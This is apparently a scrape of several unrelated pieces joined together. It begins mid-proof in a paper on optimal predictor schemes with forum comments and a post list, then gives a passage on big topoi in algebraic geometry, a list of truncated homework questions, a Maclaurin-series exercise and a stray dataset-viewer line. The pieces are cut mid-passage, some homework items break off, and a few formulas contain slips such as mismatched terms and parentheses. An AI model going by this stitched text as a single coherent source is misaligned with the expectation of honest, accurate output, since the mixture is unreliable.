$\forall (k,j) \in I: \frac{3}{4}\frac{E[w^{kj}(f-P^{kj})]^2}{E[w^{kj}]} \leq \delta(k,j)$
$\forall (k,j) \in I: \frac{3}{4}E[w^{kj}]\phi_{kj}^2 \leq \delta(k,j)$
$\forall (k,j) \in I: \phi_{kj}^2 \leq \frac{4}{3}E[w^{kj}]^{-1}\delta(k,j)$
$\forall (k,j) \in I: \phi_{kj}^2 \leq \frac{4}{3}(\mu^k \times U^{r(k,j)})\{p_{kj} \leq P^{kj} \leq q_{kj}\}^{-1}\delta(k,j)$
Thus for all $$k,j \in {\mathbb{N}}$$ we have
$|\phi_{kj}| \leq h(k,j)^{-1} + \sqrt{\frac{4}{3}(\mu^k \times U^{r(k,j)})\{p_{kj} \leq P^{kj} \leq q_{kj}\}^{-1}\delta(k,j)}$
In particular, $$|\phi| \in \Delta$$.
# Lemma B.3
Consider $$(f, \mu)$$ a distributional estimation problem and $$(P,r,a)$$ a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu)$$. Then there are $$c_1,c_2 \in {\mathbb{R}}$$ and a $$\Delta$$-moderate function $$\delta: {\mathbb{N}}^4 \rightarrow [0,1]$$ s.t. for any $$k,j,s \in {\mathbb{N}}$$, $$Q: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} {\mathbb{Q}}$$
$|E_{\mu^k \times U^s \times U^{r(k,j)}}[Q(P^{kj}-f)]| \leq (c_1 + c_2 E_{\mu^k \times U^s}[Q^2]) \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})$
Conversely, consider $$M \in {\mathbb{Q}}$$ and $$(P,r,a)$$ a $${\mathbb{Q}}\cap [-M,+M]$$-valued $$(poly,log)$$-bischeme. Suppose that for any $${\mathbb{Q}}\cap [-M-1,+M]$$-valued $$(poly,log)$$-bischeme $$(Q,s,b)$$ we have $$|E[Q(P-f)]| \in \Delta$$.
Define $$\tilde{P}$$ to be s.t. computing $$\tilde{P}^{kj}$$ is equivalent to computing $$\eta(P^{kj})$$ rounded to $$h(k,j)$$ digits after the binary point, where $$2^{-h} \in \Delta$$. Then, $$\tilde{P}$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu)$$.
# Proof of Lemma B.3
Assume $$P$$ is a $$\Delta(poly,log)$$-optimal predictor scheme. Consider $$k,j,s \in {\mathbb{N}}$$, $$Q: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} {\mathbb{Q}}$$. Define $$t := \sigma 2^{-a}$$ where $$\sigma \in \{ \pm 1 \}$$ and $$a \in {\mathbb{N}}$$. Define $$R: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} [0,1]$$ to compute $$\eta(P + tQ)$$ rounded within error $$2^{-h}$$. By Lemma B.1
$E_{\mu^k \times U^{r(k,j)}}[(P^{kj}-f)^2] \leq E_{\mu^k \times U^{r(k,j)} \times U^s}[(R-f)^2] + \tilde{\delta}(k,j,T_R^\mu(k,r(k,j)+s),2^{|R|})$
where $$\tilde{\delta}$$ is $$\Delta$$-moderate. It follows that
$E_{\mu^k \times U^{r(k,j)}}[(P^{kj}-f)^2] \leq E_{\mu^k \times U^{r(k,j)} \times U^s}[(\eta(P + tQ)-f)^2] + \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})$
where $$\delta$$ is $$\Delta$$-moderate ($$a$$ doesn’t enter the error bound because of the $$2^{-h}$$ rounding). As in the proof of Theorem A.1, $$\eta$$ can be dropped.
$E_{\mu^k \times U^{r(k,j)} \times U^s}[(P^{kj}-f)^2 - (P^{kj}+tQ-f)^2] \leq \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})$
The expression on the left hand side is a quadratic polynomial in $$t$$. Explicitly:
$-E_{\mu^k \times U^s}[Q^2]t^2 - 2E_{\mu^k \times U^{r(k,j)} \times U^s}[Q(P^{kj}-f)]t \leq \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})$
Moving $$E[Q]t^2$$ to the right hand side and dividing both sides by $$2|t|=2^{1-a}$$ we get
$-E_{\mu^k \times U^{r(k,j)} \times U^s}[Q(P^{kj}-f)]\sigma \leq 2^{a-1} \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|}) + E_{\mu^k \times U^s}[Q^2] 2^{-a-1}$
$|E_{\mu^k \times U^{r(k,j)} \times U^s}[Q(P^{kj}-f))]| \leq 2^{a-1} \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|}) + E_{\mu^k \times U^s}[Q^2] 2^{-a-1}$
Take $$a:=-\frac{1}{2}\log \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})+\phi(k,j)$$ where $$\phi(k,j) \in [-\frac{1}{2}, +\frac{1}{2}]$$ is the rounding error. We get
$|E_{\mu^k \times U^{r(k,j)} \times U^s}[Q(P^{kj}-f)]| \leq 2^{\phi(k,j)-1} \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})^{\frac{1}{2}} + E_{\mu^k \times U^s}[Q^2] 2^{-\phi(k,j)-1}\delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})^{\frac{1}{2}}$
Conversely, assume that for any $${\mathbb{Q}}\cap [-M-1,+M]$$-valued $$(poly,log)$$-bischeme $$(R,t,c)$$
$|E[R(P-f)]| \leq \delta$
Consider $$(Q,b,s)$$ a $$(poly,log)$$-predictor scheme. We have
$E[(Q - f)^2] = E[(Q - P + P - f)^2]$
$E[(Q - f)^2] = E[(Q - P)^2] + E[(P - f)^2] + 2E[(Q - P)(P - f)]$
$2E[(P - Q)(P - f)] = E[(P - f)^2] - E[(Q - f)^2] + E[(Q - P)^2]$
Taking $$R$$ to be $$P - Q$$ we get
$E[(P - f)^2] - E[(Q-f)^2] + E[(Q-P))^2] \leq \delta$
where $$\delta \in \Delta$$. Noting that $$E[(Q - P)^2] \geq 0$$ and $$(\eta(P) - f)^2 \leq (P - f)^2$$ we get
$E[(\eta(P) - f)^2] - E[(Q - f)^2] \leq \delta$
Observing that $$\tilde{P}-\eta(P)$$ is bounded by a function in $$\Delta$$, we get the desired result.
Theorems A.2 and A.3 follow trivially from Lemma B.3 and we omit the proof.
# Proof of Theorem A.4
We have
$P(x_1,x_2)-(f_1 \times f_2)(x_1,x_2) = (P_1(x_1)- f_1(x_1))f_2(x_2) + P_1(x_1)(P_2(x_2)-f_2(x_2))$
Therefore, for any $${\mathbb{Q}}\cap [-1,+1]$$-valued $$(poly,log)$$-bischeme $$(Q,s,b)$$
$|E[Q(P-f_1 \times f_2)]| \leq |E[Q(x_1,x_2)(P_1(x_1)-f_1(x_1))f_2(x_2)]| + |E[Q(x_1,x_2)P_1(x_1)(P_2(x_2)-f_2(x_2))]|$
By Lemma B.3, it is sufficient to show an appropriate bound for each of the terms on the right hand side. Suppose $$(S_2,F_2,r^S_2,a^S_2)$$ is a $$\Delta^1(log)$$-generator for $$(f_2, \mu_2)$$. For the first term, we have
$|E_{\mu_1^k \times \mu_2^k \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(x_1,x_2)(P^{kj}_1(x_1)-f_1(x_1))f_2(x_2)]| \leq |E_{\mu_1^k \times U^{r^S_2(k)} \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(x_1,S^k_2)(P^{kj}_1(x_1)-f_1(x_1))F^k_2]| + \delta^1_2(k)$
where $$\delta^1_2 \in \Delta^1$$. Applying Lemma B.3 for $$P_1$$, we get
$|E_{\mu_1^k \times \mu_2^k \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(x_1,x_2)(P^{kj}_1(x_1)-f_1(x_1))f_2(x_2)]| \leq \delta_1(k,j) + \delta^1_2(k)$
where $$\delta_1 \in \Delta$$.
Suppose $$(S_1,r^S_1,a^S_1)$$ is a $$\Delta^1(log)$$-sampler for $$\mu_1$$. For the second term, we have
$|E_{\mu_1^k \times \mu_2^k \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(x_1,x_2)P_1(x_1)(P^{kj}_2(x_2)-f_2(x_2))]| \leq |E_{U^{r^S_1(k)} \times \mu_2^k \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(S^k_1,x_2)P_1(S^k_1)(P^{kj}_2(x_2)-f_2(x_2))]| + \delta^1_1(k)$
where $$\delta^1_1 \in \Delta^1$$. Applying Lemma B.3 for $$P_2$$, we get
$|E_{\mu_1^k \times \mu_2^k \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(x_1,x_2)P_1(x_1)(P^{kj}_2(x_2)-f_2(x_2))]| \leq \delta_2(k,j) + \delta^1_1(k)$
where $$\delta_2 \in \Delta$$. Again, we got the required bound.
# Proposition C.1
Consider a polynomial $$q: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$. There is a function $$\lambda_q: {\mathbb{N}}^3 \rightarrow [0,1]$$ s.t.
1. $\forall k,j \in {\mathbb{N}}: \sum_{i \in {\mathbb{N}}} \lambda_q(k,j,i) = 1$
2. For any function $$\epsilon: {\mathbb{N}}^2 \rightarrow [0,1]$$ we have
$\epsilon(k,j) - \sum_{i \in {\mathbb{N}}} \lambda_q(k,j,i) \, \epsilon(k,q(k,j)+i) \in \Delta_{avg}^2$
# Proof of Proposition C.1
Given functions $$q_1,q_2: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ s.t. $$q_1(k,j) \geq q_2(k,j)$$ for $$k,j \gg 0$$, the proposition for $$q_1$$ implies the proposition for $$q_2$$ by setting
$\lambda_{q_2}(k,j,i):=\begin{cases}\lambda_{q_1}(k,j,i-q_1(k,j)+q_2(k,j)) & \text{if } i-q_1(k,j)+q_2(k,j) \geq 0 \\ 0 & \text{if } i-q_1(k,j)+q_2(k,j) < 0 \end{cases}$
Therefore, it is enough to prove to proposition for functions of the form $$q(k,j)=j^{m+\frac{n \log k}{\log 3}}$$ for $$m > 0$$.
Consider $$F: {\mathbb{N}}\rightarrow {\mathbb{N}}$$ s.t.
${\lim_{k \rightarrow \infty}{\frac{\log \log k}{\log \log F(k)}}} = 0$
Observe that
${\lim_{k \rightarrow \infty}{\frac{\log (m+\frac{n \log k}{\log 3})}{\log \log F(k) - \log \log 3}}} = 0$
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{3^{m+\frac{n \log k}{\log 3}}} d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
Since $$\epsilon$$ takes values in $$[0,1]$$
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{3^{m+\frac{n \log k}{\log 3}}} \epsilon(k,{\lfloor x \rfloor}) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
Similarly
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=F(k)}^{F(k)^{m+\frac{n \log k}{\log 3}}} \epsilon(k,{\lfloor x \rfloor}) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
The last two equations imply that
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{F(k)} \epsilon(k,{\lfloor x \rfloor}) d(\log \log x) - \int\limits_{x=3^{m+\frac{n \log k}{\log 3}}}^{F(k)^{m+\frac{n \log k}{\log 3}}} \epsilon(k,{\lfloor x \rfloor}) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
Raising $$x$$ to a power is equivalent to adding a constant to $$\log \log x$$, therefore
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{F(k)} \epsilon(k,{\lfloor x \rfloor}) d(\log \log x) - \int\limits_{x=3}^{F(k)} \epsilon(k,{\lfloor x^{m+\frac{n \log k}{\log 3}} \rfloor}) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{F(k)} (\epsilon(k,{\lfloor x \rfloor})-\epsilon(k,{\lfloor x^{m+\frac{n \log k}{\log 3}} \rfloor})) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
Since $${\lfloor x^{m+\frac{n \log k}{\log 3}} \rfloor} \geq {\lfloor x \rfloor}^{m+\frac{n \log k}{\log 3}}$$ we can choose $$\lambda_q$$ satisfying condition (i) so that
$\int\limits_{x=j}^{j+1} \epsilon(k,{\lfloor x^{m+\frac{n \log k}{\log 3}} \rfloor}) d(\log\log x) = (\log\log(j+1)-\log\log j) \sum_i \lambda_q(k,j,i) \, \epsilon(k,j^{m+\frac{n \log k}{\log 3}}+i)$
It follows that
$\int\limits_{x=j}^{j+1} \epsilon(k,{\lfloor x^{m+\frac{n \log k}{\log 3}} \rfloor}) d(\log\log x) = \int\limits_{x=j}^{j+1} \sum_i \lambda_q(k,{\lfloor x \rfloor},i) \, \epsilon(k,{\lfloor x \rfloor}^{m+\frac{n \log k}{\log 3}}+i) d(\log\log x)$
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{F(k)} (\epsilon(k,{\lfloor x \rfloor})-\sum_i \lambda_q(k,{\lfloor x \rfloor},i) \, \epsilon(k,{\lfloor x \rfloor}^{m+\frac{n \log k}{\log 3}}+i)) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
${\lim_{k \rightarrow \infty}{\frac{\sum_{j=3}^{F(k)-1} (\log\log(j+1)-\log\log j)(\epsilon(k,j)-\sum_i \lambda_q(k,j,i) \, \epsilon(k,j^{m+\frac{n \log k}{\log 3}}+i))}{\log \log F(k) - \log \log 3}}} = 0$
$\epsilon(k,j) - \sum_{i \in {\mathbb{N}}} \lambda_q(k,j,i) \, \epsilon(k,q(k,j)+i) \in \Delta_{avg}^2$
# Lemma C.1
Consider $$(f, \mu)$$ a distributional estimation problem, $$(P,r,a)$$, $$(Q,s,b)$$ $$(poly,log)$$-predictor schemes. Suppose $$p: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ a polynomial and $$\delta \in \Delta_{avg}^2$$ are s.t.
$\forall i,k,j \in {\mathbb{N}}: E[(P^{k,p(k,j)+i}-f)^2] \leq E[(Q^{kj}-f)^2] + \delta(k,j)$
Then $$\exists \delta' \in \Delta_{avg}^2$$ s.t.
$E[(P^{kj}-f)^2] \leq E[(Q^{kj}-f)^2] + \delta'(k,j)$
# Proof of Lemma C.1
By Proposition C.1 we have
$\tilde{\delta}(k,j) := E[(P^{kj}-f)^2] - \sum_i \lambda_p(k,j,i) E[(P^{k,p(k,j)+i}-f)^2] \in \Delta_{avg}^2$
$E[(P^{kj}-f)^2] = \sum_i \lambda_p(k,j,i) E[(P^{k,p(k,j)+i}-f)^2] + \tilde{\delta}(k,j)$
$E[(P^{kj}-f)^2] \leq \sum_i \lambda_p(k,j,i) (E[(Q^{kj}-f)^2] + \delta(k,j)) + \tilde{\delta}(k,j)$
$E[(P^{kj}-f)^2] \leq E[(Q^{kj}-f)^2] + \delta(k,j) + \tilde{\delta}(k,j)$
# Proof of Theorem 1
Define $$\epsilon(k,j)$$ by
$\epsilon(k,j) := E_{\mu^k \times U^j}[(\Upsilon^{kj}(x,y,\upsilon_{f,\mu}^{kj})-f(x))^2]$
It is easily seen that
$\epsilon(k,j) \leq \min_{\substack{|Q| \leq \log j \\ T_Q^{\mu}(k,j) \leq j}} E_{\mu^k \times U^j}[(Q(x,y)-f(x))^2]$
Therefore, there is a polynomial $$p: {\mathbb{N}}^3 \rightarrow {\mathbb{N}}$$ s.t. for any $$(poly,log)$$-predictor scheme $$(Q,s,b)$$
$\forall i,j,k \in {\mathbb{N}}: \epsilon(k,p(s(k,j),T_{Q^{kj}}^{\mu}(k,s(k,j)),2^{|Q|+|b^{kj}|})+i) \leq E_{\mu^k \times U^{s(k,j)}}[(Q^{kj}-f)^2]$
Applying Lemma C.1, we get the desired result.
# Proof of Theorem 2
Consider $$(P,r,a)$$ a $$(poly,log)$$-predictor scheme. Choose $$p: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ a polynomial s.t. evaluating $$\Lambda[G]^{k,p(k,j)}$$ involves running $$P^{kj}$$ until it halts “naturally” (such $$p$$ exists because $$P$$ runs in at most polynomial time and has at most logarithmic advice). Given $$i,j,k \in {\mathbb{N}}$$, consider the execution of $$\Lambda[G]^{k,p(k,j)+i}$$. The standard deviation of $$\epsilon(P^{kj})$$ with respect to the internal coin tosses of $$\Lambda$$ is at most $$((p(k,j)+i)k)^{-\frac{1}{2}}$$. The expectation value is $$E[(P^{kj}-f)^2]+\gamma_P$$ where $$|\gamma_P| \leq \delta(k)$$ for $$\delta \in \Delta_0^1$$ which doesn’t depend on $$i,k,j,P$$. By Chebyshev’s inequality,
$Pr[\epsilon(P^{kj}) \geq E[(P^{kj}-f)^2] + \delta(k) + ((p(k,j)+i)k)^{-\frac{1}{4}}] \leq ((p(k,j)+i)k)^{-\frac{1}{2}}$
Hence
$Pr[\epsilon(Q^*) \geq E[(P^{kj}-f)^2] + \delta(k) + ((p(k,j)+i)k)^{-\frac{1}{4}}] \leq ((p(k,j)+i)k)^{-\frac{1}{2}}$
The standard deviation of $$\epsilon(Q)$$ for any $$Q$$ is also at most $$((p(k,j)+i)k)^{-\frac{1}{2}}$$. The expectation value is $$E[(ev^{p(k,j)+i}(Q)-f)^2]+\gamma_Q$$ where $$|\gamma_Q| \leq \delta(k)$$. Therefore
$Pr[\exists Q < p(k,j)+i: \epsilon(Q) \leq E[(ev^{p(k,j)+i}(Q)-f)^2] - \delta(k) - k^{-\frac{1}{4}}] \leq (p(k,j)+i)(p(k,j)+i)^{-1}k^{-\frac{1}{2}} = k^{-\frac{1}{2}}$
The extra $$p(k,j)+i$$ factor comes from summing probabilities over $$p(k,j)+i$$ programs. Combining we get
$Pr[E[(ev^{p(k,j)+i}(Q^*)-f)^2] \geq E[(P^{kj}-f)^2] + 2\delta(k) + ((p(k,j)+i)^{-\frac{1}{4}} + 1) k^{-\frac{1}{4}}] \leq ((p(k,j)+i)^{-\frac{1}{2}} + 1) k^{-\frac{1}{2}}$
$E[(\Lambda[G]^{k,p(k,j)+i} - f)^2] \leq E[(P^{kj}-f)^2] + 2\delta(k) + ((p(k,j)+i)^{-\frac{1}{4}} + 1) k^{-\frac{1}{4}} + ((p(k,j)+i)^{-\frac{1}{2}} + 1) k^{-\frac{1}{2}}$
$E[(\Lambda[G]^{k,p(k,j)+i} - f)^2] \leq E[(P^{kj}-f)^2]+ 2\delta(k) + (p(k,j)^{-\frac{1}{4}} + 1) k^{-\frac{1}{4}} + (p(k,j)^{-\frac{1}{2}} + 1) k^{-\frac{1}{2}}$
Applying Lemma C.1 we get the desired result.
by Vadim Kosoy 1054 days ago | link EDIT: Corrected Example 5.2 and added Note 2 (previous Note 2 renamed to Note 3) reply
by Vadim Kosoy 998 days ago | link EDIT: Deleted examples of generatable problems since they are wrong. They are in fact examples of a weaker notion which I think also admits uniform OPS but this should be explored elsewhere. reply
### NEW DISCUSSION POSTS
I found an improved version
by Alex Appel on A Loophole for Self-Applicative Soundness | 0 likes
I misunderstood your
by Sam Eisenstat on A Loophole for Self-Applicative Soundness | 0 likes
Caught a flaw with this
by Alex Appel on A Loophole for Self-Applicative Soundness | 0 likes
As you say, this isn't a
by Sam Eisenstat on A Loophole for Self-Applicative Soundness | 1 like
Note: I currently think that
by Jessica Taylor on Predicting HCH using expert advice | 0 likes
Counterfactual mugging
by Jessica Taylor on Doubts about Updatelessness | 0 likes
What do you mean by "in full
by David Krueger on Doubts about Updatelessness | 0 likes
It seems relatively plausible
by Paul Christiano on Maximally efficient agents will probably have an a... | 1 like
I think that in that case,
by Alex Appel on Smoking Lesion Steelman | 1 like
by Sam Eisenstat on No Constant Distribution Can be a Logical Inductor | 1 like
A: While that is a really
by Alex Appel on Musings on Exploration | 0 likes
> The true reason to do
by Jessica Taylor on Musings on Exploration | 0 likes
by Vadim Kosoy on Musings on Exploration | 1 like
I'm not convinced exploration
by Abram Demski on Musings on Exploration | 0 likes
Update: This isn't really an
by Alex Appel on A Difficulty With Density-Zero Exploration | 0 likes
|
## 59.37 Functoriality of big topoi
Given a morphism of schemes $f : X \to Y$ there are a whole host of morphisms of topoi associated to $f$, see Topologies, Section 34.11 for a list. Perhaps the most used ones are the morphisms of topoi
$f_{big} = f_{big, \tau } : \mathop{\mathit{Sh}}\nolimits ((\mathit{Sch}/X)_\tau ) \longrightarrow \mathop{\mathit{Sh}}\nolimits ((\mathit{Sch}/Y)_\tau )$
where $\tau \in \{ Zariski, {\acute{e}tale}, smooth, syntomic, fppf\}$. These each correspond to a continuous functor
$(\mathit{Sch}/Y)_\tau \longrightarrow (\mathit{Sch}/X)_\tau , \quad V/Y \longmapsto X \times _ Y V/X$
which preserves final objects, fibre products and covering, and hence defines a morphism of sites
$f_{big} : (\mathit{Sch}/X)_\tau \longrightarrow (\mathit{Sch}/Y)_\tau .$
See Topologies, Sections 34.3, 34.4, 34.5, 34.6, and 34.7. In particular, pushforward along $f_{big}$ is given by the rule
$(f_{big, *}\mathcal{F})(V/Y) = \mathcal{F}(X \times _ Y V/X)$
It turns out that these morphisms of topoi have an inverse image functor $f_{big}^{-1}$ which is very easy to describe. Namely, we have
$(f_{big}^{-1}\mathcal{G})(U/X) = \mathcal{G}(U/Y)$
where the structure morphism of $U/Y$ is the composition of the structure morphism $U \to X$ with $f$, see Topologies, Lemmas 34.3.16, 34.4.16, 34.5.10, 34.6.10, and 34.7.12.
In your comment you can use Markdown and LaTeX style mathematics (enclose it like $\pi$). A preview option is available if you wish to see how it works out (just click on the eye in the toolbar).
|
# If we assigned three people to work with you on a complex project containing 75 tasks that you were responsible for, how would you organize this project?
###### Question:
If we assigned three people to work with you on a complex project containing 75 tasks that you were responsible for, how would you organize this project?
### Salt & sugar do not appear to have a fix shape.why do we call them solid
salt & sugar do not appear to have a fix shape.why do we call them solid...
### Why is society needed? Write yours opinion
Why is society needed? Write yours opinion...
### 135 times 25 pleasseeee
135 times 25 pleasseeee...
### (Poem is muse des beaux arts) Which of the following best describes the theme of the poem above? No one's life matters. Tragedy is everywhere. The gods are cruel. Life goes on.
(Poem is muse des beaux arts) Which of the following best describes the theme of the poem above? No one's life matters. Tragedy is everywhere. The gods are cruel. Life goes on....
### Sunita carries out an experiment to investigate diffusion. She uses water and a food dye to find out how the volume of water used affects the time the dye takes to spread evenly through the water. Her prediction is that the more water she uses, the longer the time needed for the dye to spread through it. Which variable will she change?
Sunita carries out an experiment to investigate diffusion. She uses water and a food dye to find out how the volume of water used affects the time the dye takes to spread evenly through the water. Her prediction is that the more water she uses, the longer the time needed for the dye to spread throug...
### Describe how the ancestors of whales moved from the land to the sea.
describe how the ancestors of whales moved from the land to the sea....
### Which if the following is an example of a biotic factor? A. Temperature B. Humidity C. Tree D. Air
Which if the following is an example of a biotic factor? A. Temperature B. Humidity C. Tree D. Air...
### 2. Which two organizations were formed to defend against possible communist aggression? a.UN, NATO b.NATO, SEATO c.SEATO, Warsaw Pact d.Warsaw Pact, League of Nations
2. Which two organizations were formed to defend against possible communist aggression? a.UN, NATO b.NATO, SEATO c.SEATO, Warsaw Pact d.Warsaw Pact, League of Nations...
### What are 4 examples of problems that progressives wanted to o fix? 1. 2. 3. 4.
What are 4 examples of problems that progressives wanted to o fix? 1. 2. 3. 4....
### 1. Libby is calculating her net worth. Her assets have a total of $87,545 and her liabilities are$32,158. What is the value of Libby's net worth?
1. Libby is calculating her net worth. Her assets have a total of $87,545 and her liabilities are$32,158. What is the value of Libby's net worth?...
### Mary decided that she wanted to experiment with the color of her white roses. She placed four roses in four different vases, Mary decided to put a different color dye in each vase. The next day she checked each vase and noticed that the white petals turned into the color of the dye placed in the vase. What two properties of water work together to get the colored dye up to the flower petals?
Mary decided that she wanted to experiment with the color of her white roses. She placed four roses in four different vases, Mary decided to put a different color dye in each vase. The next day she checked each vase and noticed that the white petals turned into the color of the dye placed in the vas...
### A publisher reports that 47%47% of their readers own a personal computer. A marketing executive wants to test the claim that the percentage is actually different from the reported percentage. A random sample of 280280 found that 43%43% of the readers owned a personal computer. Make the decision to reject or fail to reject the null hypothesis at the 0.010.01 level.
A publisher reports that 47%47% of their readers own a personal computer. A marketing executive wants to test the claim that the percentage is actually different from the reported percentage. A random sample of 280280 found that 43%43% of the readers owned a personal computer. Make the decision to r...
### What is the value of x in this figure? 282√ 28 143√ 283√ A right triangle with one of the acute angles labeled 30 degrees. The hypotenuse is labeled x. The leg across from 30 degree angle is labeled 14.
What is the value of x in this figure? 282√ 28 143√ 283√ A right triangle with one of the acute angles labeled 30 degrees. The hypotenuse is labeled x. The leg across from 30 degree angle is labeled 14....
### If you only knew the radius of a circle, which of these formulas can be used to find the circumference of the circle
If you only knew the radius of a circle, which of these formulas can be used to find the circumference of the circle...
### Explain how to make this an expression 176.3- 15.75
Explain how to make this an expression 176.3- 15.75...
### In the poem "Barbara Frietchie," what "flapped in the morning wind"? The clustered spires the peach tree the flag the window-sill
In the poem "Barbara Frietchie," what "flapped in the morning wind"? The clustered spires the peach tree the flag the window-sill...
### I need help urgently with this. Im so confused and need help. Social paragraph: One introductory sentence; one sentence on Black Codes; one sentence on KKK; separation of races or Jim Crow laws. Conclusion sentence connecting these laws to the 13th and 14th amendments. Political paragraph: Introductory sentence. One sentence explaining poll taxes, one sentence explaining literacy tests, one explaining grandfather clauses. One summary sentence to conclude the paragraph CONNECTING voting restrict
I need help urgently with this. Im so confused and need help. Social paragraph: One introductory sentence; one sentence on Black Codes; one sentence on KKK; separation of races or Jim Crow laws. Conclusion sentence connecting these laws to the 13th and 14th amendments. Political paragraph: Introduc...
|
# Calculus: Other Calculus Problems – #27843
Question: Find the first four terms of the MacLaurin series for each of the functions given below
a- $${{e}^{x}}\sin x$$
b- $$\frac{\ln \left( 1+x \right)}{1-x}$$
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.